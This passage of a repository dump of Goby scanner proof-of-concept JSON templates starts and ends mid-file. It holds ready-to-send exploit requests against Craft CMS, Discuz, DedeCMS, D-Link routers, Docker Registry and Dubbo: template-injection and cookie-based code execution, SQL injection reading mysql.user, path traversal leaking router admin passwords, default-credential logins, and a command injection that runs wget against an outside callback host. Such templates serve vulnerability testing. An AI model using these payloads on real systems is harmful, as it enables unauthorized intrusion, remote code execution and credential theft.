| "Author": 
"aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "craft.app.view.evaluateDynamicContent('phpinfo();')" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/actions/seomatic/meta-container/meta-link-container/?uri={{5*'5'}}", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [ 40 | "r1|rand|int|2", 41 | "r2|rand|int|2" 42 | ] 43 | }, 44 | "ResponseTest": { 45 | "type": "group", 46 | "operation": "AND", 47 | "checks": [ 48 | { 49 | "type": "item", 50 | "variable": "$code", 51 | "operation": "==", 52 | "value": "200", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "MetaLinkContainer", 60 | "bz": "" 61 | }, 62 | { 63 | "type": "item", 64 | "variable": "$body", 65 | "operation": "contains", 66 | "value": "canonical", 67 | "bz": "" 68 | }, 69 | { 70 | "type": "item", 71 | "variable": "$body", 72 | "operation": "contains", 73 | "value": "25", 74 | "bz": "" 75 | } 76 | ] 77 | }, 78 | "SetVariable": [ 79 | "output|lastbody|regex|" 80 | ] 81 | } 82 | ], 83 | "ExploitSteps": [ 84 | "AND", 85 | { 86 | "Request": { 87 | "method": "GET", 88 | "uri": "/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B{{{cmd}}}%7D%7D", 89 | "follow_redirect": false, 90 | "header": null, 91 | "data_type": "text", 92 | "data": "", 93 | "set_variable": [] 94 | }, 95 | "ResponseTest": { 96 | "type": "group", 97 | "operation": "AND", 98 | "checks": [ 99 | { 100 | "type": "item", 101 | "variable": "$code", 102 | "operation": "==", 103 | "value": "200", 104 | "bz": "" 105 | } 106 | ] 107 | }, 108 | "SetVariable": [ 109 | 
"output|lastbody||" 110 | ] 111 | } 112 | ], 113 | "PostTime": "2021-11-11 20:45:35", 114 | "GobyVersion": "1.8.302" 115 | } -------------------------------------------------------------------------------- /Datang_AC_Default_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Datang AC Default Password", 3 | "Level": "2", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")", 8 | "Description": "大唐AC集中管理平台默认密码admin/123456", 9 | "Product": "大唐电信AC集中管理平台", 10 | "Homepage": "http://www.datang.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "POST", 26 | "uri": "/login.cgi", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "window.open('index.htm?_", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$head", 54 | "operation": "contains", 55 | "value": "ac_userid=admin,ac_passwd=", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "ExploitSteps": [ 66 | "AND", 67 | { 68 | "Request": { 69 | "method": "GET", 70 | "uri": "/test.php", 71 | "follow_redirect": true, 72 | "header": null, 73 | "data_type": "text", 74 | "data": "", 75 | "set_variable": [] 
76 | }, 77 | "ResponseTest": { 78 | "type": "group", 79 | "operation": "AND", 80 | "checks": [ 81 | { 82 | "type": "item", 83 | "variable": "$code", 84 | "operation": "==", 85 | "value": "200", 86 | "bz": "" 87 | }, 88 | { 89 | "type": "item", 90 | "variable": "$body", 91 | "operation": "contains", 92 | "value": "test", 93 | "bz": "" 94 | } 95 | ] 96 | }, 97 | "SetVariable": [ 98 | "output|lastbody|regex|" 99 | ] 100 | } 101 | ], 102 | "PostTime": "2021-11-12 19:44:34", 103 | "GobyVersion": "1.8.302" 104 | } -------------------------------------------------------------------------------- /DedeCMS_Carbuyaction_FileInclude.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DedeCMS Carbuyaction FileInclude", 3 | "Level": "2", 4 | "Tags": [ 5 | "FileInclude" 6 | ], 7 | "GobyQuery": "app=\"DedeCMS\"", 8 | "Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞", 9 | "Product": "DedeCMS", 10 | "Homepage": "http://www.dedecms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.cnblogs.com/milantgh/p/3615986.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/plus/carbuyaction.php?dopost=return&code=../../", 29 | "follow_redirect": true, 30 | "header": { 31 | "Cookie": "code=alipay" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [ 51 | "output|lastbody|regex|" 52 | ] 53 | }, 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/plus/carbuyaction.php?dopost=return&code=../../", 58 | "follow_redirect": true, 59 | 
"header": { 60 | "Cookie": "code=cod" 61 | }, 62 | "data_type": "text", 63 | "data": "", 64 | "set_variable": [] 65 | }, 66 | "ResponseTest": { 67 | "type": "group", 68 | "operation": "AND", 69 | "checks": [ 70 | { 71 | "type": "item", 72 | "variable": "$code", 73 | "operation": "==", 74 | "value": "200", 75 | "bz": "" 76 | }, 77 | { 78 | "type": "item", 79 | "variable": "$body", 80 | "operation": "contains", 81 | "value": "Cod::respond()", 82 | "bz": "" 83 | } 84 | ] 85 | }, 86 | "SetVariable": [ 87 | "output|lastbody|regex|" 88 | ] 89 | } 90 | ], 91 | "PostTime": "2021-11-13 14:18:50", 92 | "GobyVersion": "1.8.302" 93 | } -------------------------------------------------------------------------------- /DedeCMS_InfoLeak_CVE_2018_6910.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DedeCMS InfoLeak CVE-2018-6910", 3 | "Level": "1", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"DedeCMS\"", 8 | "Description": "远程攻击者可通过对include/downmix.inc.php或inc/inc_archives_functions.php文件发送直接请求利用该漏洞获取完整路径。", 9 | "Product": "DedeCMS", 10 | "Homepage": "http://www.dedecms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/include/downmix.inc.php", 27 | "follow_redirect": true, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "Fatal error", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | 
"operation": "contains", 55 | "value": "downmix.inc.php", 56 | "bz": "" 57 | }, 58 | { 59 | "type": "item", 60 | "variable": "$body", 61 | "operation": "contains", 62 | "value": "Call to undefined function helper()", 63 | "bz": "" 64 | } 65 | ] 66 | }, 67 | "SetVariable": [ 68 | "output|lastbody||" 69 | ] 70 | } 71 | ], 72 | "PostTime": "2021-11-14 16:43:48", 73 | "GobyVersion": "1.8.302" 74 | } -------------------------------------------------------------------------------- /Discuz_ML_3.x_RCE__CNVD_2019_22239.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz!ML 3.x RCE CNVD-2019-22239", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=discuz | body=\"Powered by Discuz! X3.4\")", 8 | "Description": "2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用。", 9 | "Product": "Discuz!ML", 10 | "Homepage": "http://discuz.ml/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.cnblogs.com/-mo-/p/11180396.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/forum.php", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [ 49 | "cookiepre|lastbody|regex|cookiepre = '([\\w_]+)'" 50 | ] 51 | }, 52 | { 53 | "Request": { 54 | "method": "GET", 55 | "uri": "/forum.php", 56 | "follow_redirect": false, 57 | "header": { 58 | "Cookie": "{{{cookiepre}}}language=sc'.phpinfo().'" 59 | }, 60 | "data_type": "text", 61 | "data": "", 62 | 
"set_variable": [] 63 | }, 64 | "ResponseTest": { 65 | "type": "group", 66 | "operation": "AND", 67 | "checks": [ 68 | { 69 | "type": "item", 70 | "variable": "$code", 71 | "operation": "==", 72 | "value": "200", 73 | "bz": "" 74 | }, 75 | { 76 | "type": "item", 77 | "variable": "$body", 78 | "operation": "contains", 79 | "value": "PHP Version", 80 | "bz": "" 81 | }, 82 | { 83 | "type": "item", 84 | "variable": "$body", 85 | "operation": "contains", 86 | "value": "System", 87 | "bz": "" 88 | } 89 | ] 90 | }, 91 | "SetVariable": [ 92 | "output|lastbody|regex|" 93 | ] 94 | } 95 | ], 96 | "PostTime": "2021-11-16 17:10:04", 97 | "GobyVersion": "1.8.302" 98 | } -------------------------------------------------------------------------------- /Discuz_RCE_WOOYUN_2010_080723.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz RCE WOOYUN-2010-080723", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。", 9 | "Product": "discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/viewthread.php?tid=10", 29 | "follow_redirect": false, 30 | "header": { 31 | "Cookie": "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=phpinfo();" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 
42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "PHP Version", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "System", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | } 68 | ], 69 | "PostTime": "2021-11-17 13:57:54", 70 | "GobyVersion": "1.8.302" 71 | } -------------------------------------------------------------------------------- /Discuz_Wechat_Plugins_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz Wechat Plugins Unauth", 3 | "Level": "2", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "由Discuz论坛官方微信登录插件产生,攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号,通过该漏洞创建的论坛账号具备一般用户的所有权限,可以任意发帖回帖.", 9 | "Product": "discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/plugin.php?id=wechat:wechat&ac=wxregister", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "302", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$head", 49 | "operation": "contains", 50 | "value": "wsq.discuz.com", 51 | "bz": "" 52 | }, 53 | { 54 | "type": 
"item", 55 | "variable": "$head", 56 | "operation": "contains", 57 | "value": "set-cookie", 58 | "bz": "" 59 | }, 60 | { 61 | "type": "item", 62 | "variable": "$head", 63 | "operation": "contains", 64 | "value": "auth", 65 | "bz": "" 66 | }, 67 | { 68 | "type": "item", 69 | "variable": "$body", 70 | "operation": "contains", 71 | "value": "location", 72 | "bz": "" 73 | } 74 | ] 75 | }, 76 | "SetVariable": [ 77 | "output|lastbody|regex|" 78 | ] 79 | } 80 | ], 81 | "PostTime": "2021-11-17 13:52:51", 82 | "GobyVersion": "1.8.302" 83 | } -------------------------------------------------------------------------------- /Discuz_v72_SQLI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz v72 SQLI", 3 | "Level": "2", 4 | "Tags": [ 5 | "sqli" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "discuz7.2论坛存在sql注入漏洞", 9 | "Product": "Discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://blog.csdn.net/weixin_40709439/article/details/82780606" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 ", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 
| "variable": "$body", 49 | "operation": "contains", 50 | "value": "81dc9bdb52d04dc20036dbd8313ed055", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "Discuz! info: MySQL Query Error", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-16 17:48:16", 68 | "GobyVersion": "1.8.302" 69 | } -------------------------------------------------------------------------------- /Dlink_850L_Info_Leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dlink 850L Info Leak", 3 | "Level": "3", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "(app=\"DIR-850L\" | title==\"DIR-850L\")", 8 | "Description": "D-Link 850L 发现可以未授权加载 htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml.php 文件并获得管理员账号密码等敏感信息", 9 | "Product": "DIR-850L", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://xz.aliyun.com/t/2941" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/hedwig.cgi", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "text/xml", 32 | "Cookie": "uid=R8tBjwtFc7" 33 | }, 34 | "data_type": "text", 35 | "data": "../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml", 36 | "set_variable": [] 37 | }, 38 | "ResponseTest": { 39 | "type": "group", 40 | "operation": "AND", 41 | "checks": [ 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "==", 46 | "value": "200", 47 | "bz": "" 48 | }, 49 | { 50 | "type": "item", 51 | "variable": "$body", 52 | "operation": "contains", 53 | "value": "</usrid>", 54 | "bz": "" 55 | }, 56 | { 57 | "type": "item", 58 | "variable": "$body", 59 | "operation": "contains", 60 | 
"value": "</password>", 61 | "bz": "" 62 | }, 63 | { 64 | "type": "item", 65 | "variable": "$body", 66 | "operation": "contains", 67 | "value": "<result>OK</result>", 68 | "bz": "" 69 | } 70 | ] 71 | }, 72 | "SetVariable": [ 73 | "output|lastbody||" 74 | ] 75 | } 76 | ], 77 | "ExploitSteps": [ 78 | "AND", 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "/test.php", 83 | "follow_redirect": true, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "==", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "test", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "PostTime": "2021-11-24 19:23:42", 115 | "GobyVersion": "1.8.302" 116 | } -------------------------------------------------------------------------------- /Dlink_Info_Leak_CVE_2019_17506.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dlink Info Leak CVE-2019-17506", 3 | "Level": "2", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"D_Link-Router\"", 8 | "Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. 
This could be used to control the router remotely.", 9 | "Product": "Dlink", 10 | "Homepage": " http://www.dlink.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://xz.aliyun.com/t/6453" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/getcfg.php", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "application/x-www-form-urlencoded" 32 | }, 33 | "data_type": "text", 34 | "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "<name>", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "<password>", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "POST", 74 | "uri": "/getcfg.php", 75 | "follow_redirect": false, 76 | "header": { 77 | "Content-Type": "application/x-www-form-urlencoded" 78 | }, 79 | "data_type": "text", 80 | "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "200", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody||" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-26 19:19:16", 102 | "GobyVersion": "1.9.310" 103 | } 
-------------------------------------------------------------------------------- /Dlink_RCE_CVE_2019_16920.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dlink RCE CVE-2019-16920", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"D_Link-Router\" | body=\"DIR-655\" | body=\"DIR-866L\" | body=\"DIR-652\" | body=\"DHP-1565\")", 8 | "Description": "Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to command injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.", 9 | "Product": "Dlink", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.anquanke.com/post/id/187923" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/apply_sec.cgi", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "application/x-www-form-urlencoded" 32 | }, 33 | "data_type": "text", 34 | "data": "html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://{{{check}}}", 35 | "set_variable": [ 36 | "check|dnslog|4|15" 37 | ] 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$reserver", 53 | "operation": "contains", 54 | "value": 
"{{{check}}}", 55 | "bz": "" 56 | } 57 | ] 58 | }, 59 | "SetVariable": [ 60 | "output|lastbody|regex|" 61 | ] 62 | } 63 | ], 64 | "ExploitSteps": [ 65 | "AND", 66 | { 67 | "Request": { 68 | "method": "GET", 69 | "uri": "/test.php", 70 | "follow_redirect": true, 71 | "header": null, 72 | "data_type": "text", 73 | "data": "", 74 | "set_variable": [] 75 | }, 76 | "ResponseTest": { 77 | "type": "group", 78 | "operation": "AND", 79 | "checks": [ 80 | { 81 | "type": "item", 82 | "variable": "$code", 83 | "operation": "==", 84 | "value": "200", 85 | "bz": "" 86 | }, 87 | { 88 | "type": "item", 89 | "variable": "$body", 90 | "operation": "contains", 91 | "value": "test", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody|regex|" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-25 18:14:25", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Docker_Registry_API_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Docker Registry API Unauth", 3 | "Level": "2", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "header=\"registry/2.0\"", 8 | "Description": "Docker Registry API 存在未授权访问漏洞,黑客可通过API下载docker images,导致敏感信息泄露。", 9 | "Product": "Docker Registry", 10 | "Homepage": "https://docs.docker.com/registry/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.freeaihub.com/post/6085.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/v2/", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": 
"$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$head", 49 | "operation": "contains", 50 | "value": "docker-distribution-api-version", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$head", 56 | "operation": "contains", 57 | "value": "registry/2.0", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | }, 66 | { 67 | "Request": { 68 | "method": "GET", 69 | "uri": "/v2/_catalog", 70 | "follow_redirect": true, 71 | "header": null, 72 | "data_type": "text", 73 | "data": "", 74 | "set_variable": [] 75 | }, 76 | "ResponseTest": { 77 | "type": "group", 78 | "operation": "AND", 79 | "checks": [ 80 | { 81 | "type": "item", 82 | "variable": "$code", 83 | "operation": "==", 84 | "value": "200", 85 | "bz": "" 86 | }, 87 | { 88 | "type": "item", 89 | "variable": "$body", 90 | "operation": "contains", 91 | "value": "repositories", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody|regex|" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-27 14:21:33", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Dubbo_Admin_Default_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Dubbo Admin Default Password", 3 | "Level": "3", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "app=\"APACHE-dubbo\"", 8 | "Description": "Dubbo Admin管理控制台存在默认口令root/root和guest/guest", 9 | "Product": "dubbo", 10 | "Homepage": "https://dubbo.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/chaitin/xray/blob/master/pocs/dubbo-admin-default-password.yml" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "OR", 25 | { 26 | "Request": 
